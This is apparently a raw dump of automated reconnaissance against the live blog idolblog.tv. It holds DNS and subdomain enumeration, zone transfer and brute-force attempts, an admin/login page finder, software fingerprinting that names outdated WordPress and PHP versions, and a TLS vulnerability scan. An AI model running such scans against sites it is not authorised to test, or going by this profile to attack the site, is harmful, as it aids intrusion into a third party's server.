792 6.|-- lag-14.ear5.Dallas1.Level3.net 0.0% 3 1.6 1.7 1.6 1.8 0.1
793 7.|-- ae-2-3207.edge6.Amsterdam1.Level3.net 0.0% 3 111.5 111.5 111.5 111.6 0.0
794 8.|-- unknown.Level3.net 0.0% 3 119.2 119.8 114.7 125.5 5.4
795 9.|-- 89.248.174.131 0.0% 3 118.4 118.5 118.4 118.7 0.1
796
797
798
799
800Ping 'idolblog.tv'
801---------------------
802
803error check your api query
804
805
806
807Page Admin Finder 'idolblog.tv'
808----------------------------------
809
810
811
812Avilable Links :
813
814Find Page >> http://idolblog.tv/admin/
815
816Find Page >> http://idolblog.tv/admin/index.php
817
818Find Page >> http://idolblog.tv/wp-login.php
819######################################################################################################################################
820Trying "idolblog.tv"
821;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 59537
822;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 3, ADDITIONAL: 13
823
824;; QUESTION SECTION:
825;idolblog.tv. IN ANY
826
827;; ANSWER SECTION:
828idolblog.tv. 43200 IN A 89.248.174.131
829idolblog.tv. 43200 IN SOA ns1.dnsowl.com. hostmaster.dnsowl.com. 1563606532 7200 1800 1209600 600
830idolblog.tv. 43200 IN NS ns1.dnsowl.com.
831idolblog.tv. 43200 IN NS ns2.dnsowl.com.
832idolblog.tv. 43200 IN NS ns3.dnsowl.com.
833
834;; AUTHORITY SECTION:
835idolblog.tv. 43200 IN NS ns3.dnsowl.com.
836idolblog.tv. 43200 IN NS ns2.dnsowl.com.
837idolblog.tv. 43200 IN NS ns1.dnsowl.com.
838
839;; ADDITIONAL SECTION:
840ns1.dnsowl.com. 42918 IN A 104.207.141.138
841ns1.dnsowl.com. 42918 IN A 104.223.96.2
842ns1.dnsowl.com. 42918 IN A 168.235.75.84
843ns1.dnsowl.com. 42918 IN A 172.106.7.203
844ns1.dnsowl.com. 42918 IN A 185.34.216.159
845ns1.dnsowl.com. 42918 IN A 198.251.84.16
846ns1.dnsowl.com. 42918 IN A 204.188.203.153
847ns1.dnsowl.com. 42918 IN A 37.187.179.91
848ns1.dnsowl.com. 42918 IN A 45.63.5.234
849ns1.dnsowl.com. 42918 IN A 45.63.106.63
850ns1.dnsowl.com. 42918 IN A 64.32.22.100
851ns1.dnsowl.com. 42918 IN A 92.222.189.157
852ns1.dnsowl.com. 21981 IN AAAA 2001:19f0:5c01:bb0:5400:ff:fe1d:d1cc
853
854Received 418 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 78 ms
855#######################################################################################################################################
856; <<>> DiG 9.11.5-P4-5.1-Debian <<>> +trace idolblog.tv any
857;; global options: +cmd
858. 81455 IN NS l.root-servers.net.
859. 81455 IN NS d.root-servers.net.
860. 81455 IN NS h.root-servers.net.
861. 81455 IN NS j.root-servers.net.
862. 81455 IN NS m.root-servers.net.
863. 81455 IN NS a.root-servers.net.
864. 81455 IN NS i.root-servers.net.
865. 81455 IN NS b.root-servers.net.
866. 81455 IN NS f.root-servers.net.
867. 81455 IN NS k.root-servers.net.
868. 81455 IN NS e.root-servers.net.
869. 81455 IN NS c.root-servers.net.
870. 81455 IN NS g.root-servers.net.
871. 81455 IN RRSIG NS 8 0 518400 20190802050000 20190720040000 59944 . xIGI0GR44vw+NEuzO6GnyLATp8pXsEcrlyRkMSRegmDhRt5AhTz31YgI DJgEaTMK3eqRDerXC1jM1qmVhUGTv7eOIzTDqi0mW9AxdW36Is9V3rNf 4dUG6Jx8akmv2pLUh29Ga2Hq3pO5KtqF7SUUPLCULZEYxtGvej35YY2b ON2NbuDejNONwEDUtIZv2REd+PUvSIGIxjRnU1pYZ3/Q8jLBZDLJ/yF2 fk28kIntZk8jT4qG4ADrb6Wwb0jZj3xzUjAgGiwS88YyUIoOBFh216eY l+uFkWgqTIkr7iTcRwQS6aO+t4JOD5LBk9b/8cN/24EUUm67CTQ6vsAf yTM6aQ==
872;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 232 ms
873
874tv. 172800 IN NS ac1.nstld.com.
875tv. 172800 IN NS ac3.nstld.com.
876tv. 172800 IN NS ac2.nstld.com.
877tv. 172800 IN NS ac4.nstld.com.
878tv. 86400 IN DS 44904 8 1 3E447F7145888B3137E9D83EEC9FB77671A8647D
879tv. 86400 IN DS 44904 8 2 1CFE1309925B78F42C8B4862A670B0BAB9FC142ED8B4D41E24C65FE6 A0D9DFB4
880tv. 86400 IN RRSIG DS 8 1 86400 20190802050000 20190720040000 59944 . W6MbiCO8zCEaaw9+S0S1XsZk1bDrYkNbluc2BpyXHo+ux330DEOAP+To hn+lmh9BfzVrPSy1nn4KB+4lQAUG8NyZNFzEqpEblmGCCWmJFomsDRvx v1kSztpxjorOs04fhZ29cOZvY0ibJ7uzQyZXpAmfQpb3OKhzZRUvj8SR vMjskflF91/0+3yasJwVtSPyiJVe9ZMonm5FfL0v0uKlEqtmHXlgxZmt /QL/5q+CLSvPneRB7Jjgve1HJDmevN5/XuGs6gTqYmZwQlXsKa1/kxrk AN1tM6pyBlGjtcUk+RtRV3VJvic2o1LoK/ddPjF4n1DpuwsB2ukWxVMW y5ijfQ==
881;; Received 696 bytes from 199.9.14.201#53(b.root-servers.net) in 362 ms
882
883idolblog.tv. 172800 IN NS ns3.dnsowl.com.
884idolblog.tv. 172800 IN NS ns2.dnsowl.com.
885idolblog.tv. 172800 IN NS ns1.dnsowl.com.
886E7Q4EUC85B62PB5AJFJ5J1ACUGC1ET4Q.tv. 86400 IN NSEC3 1 1 0 - E82QTN8CDGTCVRGO2NPET7KN70V9NDVJ NS SOA RRSIG DNSKEY NSEC3PARAM
887E7Q4EUC85B62PB5AJFJ5J1ACUGC1ET4Q.tv. 86400 IN RRSIG NSEC3 8 2 86400 20190726212012 20190719212012 35290 tv. jBwAlSotPABPJ1LSW7lCKlRWJLxxbv1KFyI2iCMHONDQ+Dw/CNhxtmgS 0+7HNmzvXXOw3C1EECvhLPeN/oRp7s8mzH02u7H4rY8LPpltVQtXe+1U sGn9h5yvtqTO71SLoEJCpQ2T0h0qF61cxLOXkmYPa37/il500GrAKslb xoToGjme817ZW/iVl5VYOMidMlN8OoSFnUJLTnZJUlaK0Q==
888KUBVI13DA8SQUH1TJ856CGUFKJ8175DL.tv. 86400 IN NSEC3 1 1 0 - KUCEBOI28GU3TOT749VPU3VFBS4556JM NS DS RRSIG
889KUBVI13DA8SQUH1TJ856CGUFKJ8175DL.tv. 86400 IN RRSIG NSEC3 8 2 86400 20190724024831 20190717024831 35290 tv. W2ePLRJL3nPf9PXqO9icfEi/hstdODaZmQYflNzqW8lmN6XeY2+9dbmy OqDjtRbIc2YEDvdtdabeuZaSMzS3jJ+GHQVuIpKN4I0JVILZih7+qWoH r0jOyDczlkr7DVjLJSWviSmF37+YQLLhPB6xXPLtlEZfazYelPrwZzyY Ho78x4p7SQw7ExRAoJgAf8UPcOgd2TTr+kEZ2RuaMCBYlA==
890;; Received 651 bytes from 192.42.175.30#53(ac3.nstld.com) in 226 ms
891
892;; expected opt record in response
893idolblog.tv. 172800 IN NS ns1.dnsowl.com.
894idolblog.tv. 172800 IN NS ns2.dnsowl.com.
895idolblog.tv. 172800 IN NS ns3.dnsowl.com.
896idolblog.tv. 172800 IN SOA ns1.dnsowl.com. hostmaster.dnsowl.com. 1563606532 7200 1800 1209600 600
897idolblog.tv. 172816 IN A 89.248.174.131
898;; Received 300 bytes from 37.187.179.91#53(ns1.dnsowl.com) in 242 ms
899#######################################################################################################################################
900[*] Performing General Enumeration of Domain: idolblog.tv
901[-] DNSSEC is not configured for idolblog.tv
902[*] SOA ns1.dnsowl.com 168.235.75.84
903[*] SOA ns1.dnsowl.com 104.207.141.138
904[*] SOA ns1.dnsowl.com 37.187.179.91
905[*] SOA ns1.dnsowl.com 64.32.22.100
906[*] SOA ns1.dnsowl.com 45.63.106.63
907[*] SOA ns1.dnsowl.com 92.222.189.157
908[*] SOA ns1.dnsowl.com 198.251.84.16
909[*] SOA ns1.dnsowl.com 185.34.216.159
910[*] SOA ns1.dnsowl.com 45.63.5.234
911[*] SOA ns1.dnsowl.com 204.188.203.153
912[*] SOA ns1.dnsowl.com 172.106.7.203
913[*] SOA ns1.dnsowl.com 104.223.96.2
914[*] NS ns1.dnsowl.com 168.235.75.84
915[*] NS ns1.dnsowl.com 104.207.141.138
916[*] NS ns1.dnsowl.com 37.187.179.91
917[*] NS ns1.dnsowl.com 64.32.22.100
918[*] NS ns1.dnsowl.com 45.63.106.63
919[*] NS ns1.dnsowl.com 92.222.189.157
920[*] NS ns1.dnsowl.com 198.251.84.16
921[*] NS ns1.dnsowl.com 185.34.216.159
922[*] NS ns1.dnsowl.com 45.63.5.234
923[*] NS ns1.dnsowl.com 204.188.203.153
924[*] NS ns1.dnsowl.com 172.106.7.203
925[*] NS ns1.dnsowl.com 104.223.96.2
926[*] NS ns1.dnsowl.com 2001:19f0:5c01:bb0:5400:ff:fe1d:d1cc
927[*] NS ns3.dnsowl.com 45.32.237.128
928[*] NS ns3.dnsowl.com 107.161.23.49
929[*] NS ns3.dnsowl.com 104.207.130.197
930[*] NS ns3.dnsowl.com 164.132.212.78
931[*] NS ns3.dnsowl.com 103.102.161.229
932[*] NS ns3.dnsowl.com 45.63.106.63
933[*] NS ns3.dnsowl.com 204.77.1.99
934[*] NS ns3.dnsowl.com 45.76.136.92
935[*] NS ns3.dnsowl.com 51.254.227.33
936[*] NS ns3.dnsowl.com 45.32.131.25
937[*] NS ns3.dnsowl.com 209.141.39.150
938[*] NS ns3.dnsowl.com 158.69.33.230
939[*] NS ns3.dnsowl.com 2001:19f0:9002:12b4:5400:ff:fe1d:d25a
940[*] NS ns2.dnsowl.com 45.35.72.169
941[*] NS ns2.dnsowl.com 198.251.81.68
942[*] NS ns2.dnsowl.com 168.235.75.52
943[*] NS ns2.dnsowl.com 5.196.27.156
944[*] NS ns2.dnsowl.com 96.47.239.164
945[*] NS ns2.dnsowl.com 142.4.203.33
946[*] NS ns2.dnsowl.com 45.63.62.227
947[*] NS ns2.dnsowl.com 45.32.237.128
948[*] NS ns2.dnsowl.com 167.114.213.239
949[*] NS ns2.dnsowl.com 45.58.190.81
950[*] NS ns2.dnsowl.com 104.207.141.138
951[*] NS ns2.dnsowl.com 107.150.29.109
952[*] NS ns2.dnsowl.com 2001:19f0:5001:eed:5400:ff:fe1d:d24f
953[-] Could not Resolve MX Records for idolblog.tv
954[*] A idolblog.tv 89.248.174.131
955[*] Enumerating SRV Records
956[-] No SRV Records Found for idolblog.tv
957[+] 0 Records Found
958#######################################################################################################################################
959[*] Processing domain idolblog.tv
960[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
961[+] Getting nameservers
962168.235.75.84 - ns1.dnsowl.com
963104.207.141.138 - ns1.dnsowl.com
96437.187.179.91 - ns1.dnsowl.com
96564.32.22.100 - ns1.dnsowl.com
96645.63.106.63 - ns1.dnsowl.com
96792.222.189.157 - ns1.dnsowl.com
968198.251.84.16 - ns1.dnsowl.com
969185.34.216.159 - ns1.dnsowl.com
97045.63.5.234 - ns1.dnsowl.com
971204.188.203.153 - ns1.dnsowl.com
972172.106.7.203 - ns1.dnsowl.com
973104.223.96.2 - ns1.dnsowl.com
97445.32.237.128 - ns3.dnsowl.com
975107.161.23.49 - ns3.dnsowl.com
976104.207.130.197 - ns3.dnsowl.com
977164.132.212.78 - ns3.dnsowl.com
978103.102.161.229 - ns3.dnsowl.com
97945.63.106.63 - ns3.dnsowl.com
980204.77.1.99 - ns3.dnsowl.com
98145.76.136.92 - ns3.dnsowl.com
98251.254.227.33 - ns3.dnsowl.com
98345.32.131.25 - ns3.dnsowl.com
984209.141.39.150 - ns3.dnsowl.com
985158.69.33.230 - ns3.dnsowl.com
98645.35.72.169 - ns2.dnsowl.com
987198.251.81.68 - ns2.dnsowl.com
988168.235.75.52 - ns2.dnsowl.com
9895.196.27.156 - ns2.dnsowl.com
99096.47.239.164 - ns2.dnsowl.com
991142.4.203.33 - ns2.dnsowl.com
99245.63.62.227 - ns2.dnsowl.com
99345.32.237.128 - ns2.dnsowl.com
994167.114.213.239 - ns2.dnsowl.com
99545.58.190.81 - ns2.dnsowl.com
996104.207.141.138 - ns2.dnsowl.com
997107.150.29.109 - ns2.dnsowl.com
998[-] Zone transfer failed
999
1000[*] Scanning idolblog.tv for A records
100189.248.174.131 - idolblog.tv
100289.248.174.131 - www.idolblog.tv
1003#######################################################################################################################################
1004WhatWeb report for http://idolblog.tv
1005Status : 200 OK
1006Title : IdolBlog - Daily pictures of gravure idols from Japan.
1007IP : 89.248.174.131
1008Country : NETHERLANDS, NL
1009
1010Summary : Google-Analytics[Universal][UA-90400338-8], HTTPServer[Apache/2], Email[sinblogs@protonmail.com], WordPress[5.2.2], PoweredBy[Supercounters], Script[text/javascript,text/javascript>], X-Powered-By[PHP/5.6.35], HTML5, UncommonHeaders[upgrade,link], MetaGenerator[WordPress 5.2.2], PHP[5.6.35], Apache[2]
1011
1012Detected Plugins:
1013[ Apache ]
1014 The Apache HTTP Server Project is an effort to develop and
1015 maintain an open-source HTTP server for modern operating
1016 systems including UNIX and Windows NT. The goal of this
1017 project is to provide a secure, efficient and extensible
1018 server that provides HTTP services in sync with the current
1019 HTTP standards.
1020
1021 Version : 2 (from HTTP Server Header)
1022 Google Dorks: (3)
1023 Website : http://httpd.apache.org/
1024
1025[ Email ]
1026 Extract email addresses. Find valid email address and
1027 syntactically invalid email addresses from mailto: link
1028 tags. We match syntactically invalid links containing
1029 mailto: to catch anti-spam email addresses, eg. bob at
1030 gmail.com. This uses the simplified email regular
1031 expression from
1032 http://www.regular-expressions.info/email.html for valid
1033 email address matching.
1034
1035 String : sinblogs@protonmail.com
1036 String : sinblogs@protonmail.com
1037
1038[ Google-Analytics ]
1039 This plugin identifies the Google Analytics account.
1040
1041 Version : Universal
1042 Account : UA-90400338-8
1043 Website : http://www.google.com/analytics/
1044
1045[ HTML5 ]
1046 HTML version 5, detected by the doctype declaration
1047
1048
1049[ HTTPServer ]
1050 HTTP server header string. This plugin also attempts to
1051 identify the operating system from the server header.
1052
1053 String : Apache/2 (from server string)
1054
1055[ MetaGenerator ]
1056 This plugin identifies meta generator tags and extracts its
1057 value.
1058
1059 String : WordPress 5.2.2
1060
1061[ PHP ]
1062 PHP is a widely-used general-purpose scripting language
1063 that is especially suited for Web development and can be
1064 embedded into HTML. This plugin identifies PHP errors,
1065 modules and versions and extracts the local file path and
1066 username if present.
1067
1068 Version : 5.6.35
1069 Google Dorks: (2)
1070 Website : http://www.php.net/
1071
1072[ PoweredBy ]
1073 This plugin identifies instances of 'Powered by x' text and
1074 attempts to extract the value for x.
1075
1076 String : Supercounters
1077
1078[ Script ]
1079 This plugin detects instances of script HTML elements and
1080 returns the script language/type.
1081
1082 String : text/javascript,text/javascript>
1083
1084[ UncommonHeaders ]
1085 Uncommon HTTP server headers. The blacklist includes all
1086 the standard headers and many non standard but common ones.
1087 Interesting but fairly common headers should have their own
1088 plugins, eg. x-powered-by, server and x-aspnet-version.
1089 Info about headers can be found at www.http-stats.com
1090
1091 String : upgrade,link (from headers)
1092
1093[ WordPress ]
1094 WordPress is an opensource blogging system commonly used as
1095 a CMS.
1096
1097 Version : 5.2.2
1098 Aggressive function available (check plugin file or details).
1099 Google Dorks: (1)
1100 Website : http://www.wordpress.org/
1101
1102[ X-Powered-By ]
1103 X-Powered-By HTTP header
1104
1105 String : PHP/5.6.35 (from x-powered-by string)
1106
1107HTTP Headers:
1108 HTTP/1.1 200 OK
1109 Date: Sat, 20 Jul 2019 07:38:39 GMT
1110 Server: Apache/2
1111 Upgrade: h2,h2c
1112 Connection: Upgrade, close
1113 X-Powered-By: PHP/5.6.35
1114 Link: <http://idolblog.tv/wp-json/>; rel="https://api.w.org/"
1115 Vary: Accept-Encoding,User-Agent
1116 Content-Encoding: gzip
1117 Content-Length: 12267
1118 Content-Type: text/html; charset=UTF-8
1119#######################################################################################################################################
1120DNS Servers for idolblog.tv:
1121 ns1.dnsowl.com
1122 ns3.dnsowl.com
1123 ns2.dnsowl.com
1124
1125Trying zone transfer first...
1126 Testing ns1.dnsowl.com
1127 Request timed out or transfer not allowed.
1128 Testing ns3.dnsowl.com
1129 Request timed out or transfer not allowed.
1130 Testing ns2.dnsowl.com
1131 Request timed out or transfer not allowed.
1132
1133Unsuccessful in zone transfer (it was worth a shot)
1134Okay, trying the good old fashioned way... brute force
1135
1136Checking for wildcard DNS...
1137Nope. Good.
1138Now performing 2280 test(s)...
113989.248.174.131 www.idolblog.tv
1140
1141Subnets found (may want to probe here using nmap or unicornscan):
1142 89.248.174.0-255 : 1 hostnames found.
1143
1144Done with Fierce scan: http://ha.ckers.org/fierce/
1145Found 1 entries.
1146
1147Have a nice day.
1148#######################################################################################################################################
1149
1150
1151
1152 AVAILABLE PLUGINS
1153 -----------------
1154
1155 OpenSslCipherSuitesPlugin
1156 EarlyDataPlugin
1157 CertificateInfoPlugin
1158 HttpHeadersPlugin
1159 OpenSslCcsInjectionPlugin
1160 RobotPlugin
1161 CompressionPlugin
1162 SessionResumptionPlugin
1163 HeartbleedPlugin
1164 FallbackScsvPlugin
1165 SessionRenegotiationPlugin
1166
1167
1168
1169 CHECKING HOST(S) AVAILABILITY
1170 -----------------------------
1171
1172 89.248.174.131:443 => 89.248.174.131
1173
1174
1175
1176
1177 SCAN RESULTS FOR 89.248.174.131:443 - 89.248.174.131
1178 ----------------------------------------------------
1179
1180 * Downgrade Attacks:
1181 TLS_FALLBACK_SCSV: OK - Supported
1182
1183 * Session Renegotiation:
1184 Client-initiated Renegotiation: OK - Rejected
1185 Secure Renegotiation: OK - Supported
1186
1187 * OpenSSL Heartbleed:
1188 OK - Not vulnerable to Heartbleed
1189
1190 * TLSV1_1 Cipher Suites:
1191 Forward Secrecy OK - Supported
1192 RC4 OK - Not Supported
1193
1194 Preferred:
1195 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1196 Accepted:
1197 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1198 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1199 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1200 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1201 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1202 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1203 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1204 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1205 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1206 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1207 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1208 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1209
1210 * TLSV1_2 Cipher Suites:
1211 Forward Secrecy OK - Supported
1212 RC4 OK - Not Supported
1213
1214 Preferred:
1215 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1216 Accepted:
1217 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1218 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1219 TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1220 TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
1221 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1222 TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1223 TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1224 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1225 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1226 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1227 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 200 OK
1228 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1229 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1230 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1231 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1232 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1233 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1234 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1235 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 200 OK
1236 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 200 OK
1237 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1238 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 200 OK
1239 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 200 OK
1240 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1241
1242 * OpenSSL CCS Injection:
1243 OK - Not vulnerable to OpenSSL CCS injection
1244
1245 * ROBOT Attack:
1246 OK - Not vulnerable
1247
1248 * Certificate Information:
1249 Content
1250 SHA1 Fingerprint: 3b0eb01d3e326df280d6071ae5f898b9338e779a
1251 Common Name: localhost
1252 Issuer: localhost
1253 Serial Number: 15411711591063170603
1254 Not Before: 2018-04-19 13:55:51
1255 Not After: 2045-09-03 13:55:51
1256 Signature Algorithm: sha256
1257 Public Key Algorithm: RSA
1258 Key Size: 2048
1259 Exponent: 65537 (0x10001)
1260 DNS Subject Alternative Names: []
1261
1262 Trust
1263 Hostname Validation: FAILED - Certificate does NOT match 89.248.174.131
1264 Android CA Store (9.0.0_r9): FAILED - Certificate is NOT Trusted: self signed certificate
1265 iOS CA Store (12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
1266 Java CA Store (jdk-11.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
1267 macOS CA Store (12, macOS 10.14, watchOS 5, and tvOS 12):FAILED - Certificate is NOT Trusted: self signed certificate
1268 Mozilla CA Store (2018-11-22): FAILED - Certificate is NOT Trusted: self signed certificate
1269 OPENJDK CA Store (jdk-11.0.2): FAILED - Certificate is NOT Trusted: self signed certificate
1270 Windows CA Store (2018-12-08): FAILED - Certificate is NOT Trusted: self signed certificate
1271 Symantec 2018 Deprecation: OK - Not a Symantec-issued certificate
1272 Received Chain: localhost
1273 Verified Chain: ERROR - Could not build verified chain (certificate untrusted?)
1274 Received Chain Contains Anchor: ERROR - Could not build verified chain (certificate untrusted?)
1275 Received Chain Order: OK - Order is valid
1276 Verified Chain contains SHA1: ERROR - Could not build verified chain (certificate untrusted?)
1277
1278 Extensions
1279 OCSP Must-Staple: NOT SUPPORTED - Extension not found
1280 Certificate Transparency: NOT SUPPORTED - Extension not found
1281
1282 OCSP Stapling
1283 NOT SUPPORTED - Server did not send back an OCSP response
1284
1285 * TLS 1.2 Session Resumption Support:
1286 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1287 With TLS Tickets: OK - Supported
1288
1289 * SSLV2 Cipher Suites:
1290 Server rejected all cipher suites.
1291
1292 * Deflate Compression:
1293 OK - Compression disabled
1294
1295 * TLSV1 Cipher Suites:
1296 Forward Secrecy OK - Supported
1297 RC4 OK - Not Supported
1298
1299 Preferred:
1300 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1301 Accepted:
1302 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1303 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1304 TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1305 TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1306 TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1307 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1308 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1309 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 200 OK
1310 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 200 OK
1311 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 200 OK
1312 TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 200 OK
1313 TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 200 OK
1314
1315 * TLSV1_3 Cipher Suites:
1316 Server rejected all cipher suites.
1317
1318 * SSLV3 Cipher Suites:
1319 Server rejected all cipher suites.
1320
1321
1322 SCAN COMPLETED IN 20.61 S
1323 -------------------------
1324######################################################################################################################################
1325dnsenum VERSION:1.2.4
1326
1327----- idolblog.tv -----
1328
1329
1330Host's addresses:
1331__________________
1332
1333idolblog.tv. 80647 IN A 89.248.174.131
1334
1335
1336Name Servers:
1337______________
1338
1339ns1.dnsowl.com. 86367 IN A 168.235.75.84
1340ns1.dnsowl.com. 86367 IN A 104.207.141.138
1341ns1.dnsowl.com. 86367 IN A 37.187.179.91
1342ns1.dnsowl.com. 86367 IN A 64.32.22.100
1343ns1.dnsowl.com. 86367 IN A 45.63.106.63
1344ns1.dnsowl.com. 86367 IN A 92.222.189.157
1345ns1.dnsowl.com. 86367 IN A 198.251.84.16
1346ns1.dnsowl.com. 86367 IN A 185.34.216.159
1347ns1.dnsowl.com. 86367 IN A 45.63.5.234
1348ns1.dnsowl.com. 86367 IN A 204.188.203.153
1349ns1.dnsowl.com. 86367 IN A 172.106.7.203
1350ns1.dnsowl.com. 86367 IN A 104.223.96.2
1351ns3.dnsowl.com. 86389 IN A 45.32.237.128
1352ns3.dnsowl.com. 86389 IN A 107.161.23.49
1353ns3.dnsowl.com. 86389 IN A 104.207.130.197
1354ns3.dnsowl.com. 86389 IN A 164.132.212.78
1355ns3.dnsowl.com. 86389 IN A 103.102.161.229
1356ns3.dnsowl.com. 86389 IN A 45.63.106.63
1357ns3.dnsowl.com. 86389 IN A 204.77.1.99
1358ns3.dnsowl.com. 86389 IN A 45.76.136.92
1359ns3.dnsowl.com. 86389 IN A 51.254.227.33
1360ns3.dnsowl.com. 86389 IN A 45.32.131.25
1361ns3.dnsowl.com. 86389 IN A 209.141.39.150
1362ns3.dnsowl.com. 86389 IN A 158.69.33.230
1363ns2.dnsowl.com. 86367 IN A 45.35.72.169
1364ns2.dnsowl.com. 86367 IN A 198.251.81.68
1365ns2.dnsowl.com. 86367 IN A 168.235.75.52
1366ns2.dnsowl.com. 86367 IN A 5.196.27.156
1367ns2.dnsowl.com. 86367 IN A 96.47.239.164
1368ns2.dnsowl.com. 86367 IN A 142.4.203.33
1369ns2.dnsowl.com. 86367 IN A 45.63.62.227
1370ns2.dnsowl.com. 86367 IN A 45.32.237.128
1371ns2.dnsowl.com. 86367 IN A 167.114.213.239
1372ns2.dnsowl.com. 86367 IN A 45.58.190.81
1373ns2.dnsowl.com. 86367 IN A 104.207.141.138
1374ns2.dnsowl.com. 86367 IN A 107.150.29.109
1375
1376
1377Mail (MX) Servers:
1378___________________
1379
1380
1381
1382Trying Zone Transfers and getting Bind Versions:
1383_________________________________________________
1384
1385
1386Trying Zone Transfer for idolblog.tv on ns1.dnsowl.com ...
1387
1388Trying Zone Transfer for idolblog.tv on ns3.dnsowl.com ...
1389
1390Trying Zone Transfer for idolblog.tv on ns2.dnsowl.com ...
1391
1392brute force file not specified, bay.
1393#######################################################################################################################################
1394
1395[-] Enumerating subdomains now for idolblog.tv
1396[-] verbosity is enabled, will show the subdomains results in realtime
1397[-] Searching now in Baidu..
1398[-] Searching now in Yahoo..
1399[-] Searching now in Google..
1400[-] Searching now in Bing..
1401[-] Searching now in Ask..
1402[-] Searching now in Netcraft..
1403[-] Searching now in DNSdumpster..
1404[-] Searching now in Virustotal..
1405[-] Searching now in ThreatCrowd..
1406[-] Searching now in SSL Certificates..
1407[-] Searching now in PassiveDNS..
1408DNSdumpster: www.idolblog.tv
1409[-] Saving results to file: /usr/share/sniper/loot/workspace/idolblog.tv/domains/domains-idolblog.tv.txt
1410[-] Total Unique Subdomains Found: 1
1411www.idolblog.tv
1412########################################################################################################################################
1413idolblog.tv,89.248.174.131
1414www.idolblog.tv,89.248.174.131
1415######################################################################################################################################
1416===============================================
1417-=Subfinder v1.1.3 github.com/subfinder/subfinder
1418===============================================
1419
1420
1421Running Source: Ask
1422Running Source: Archive.is
1423Running Source: Baidu
1424Running Source: Bing
1425Running Source: CertDB
1426Running Source: CertificateTransparency
1427Running Source: Certspotter
1428Running Source: Commoncrawl
1429Running Source: Crt.sh
1430Running Source: Dnsdb
1431Running Source: DNSDumpster
1432Running Source: DNSTable
1433Running Source: Dogpile
1434Running Source: Exalead
1435Running Source: Findsubdomains
1436Running Source: Googleter
1437Running Source: Hackertarget
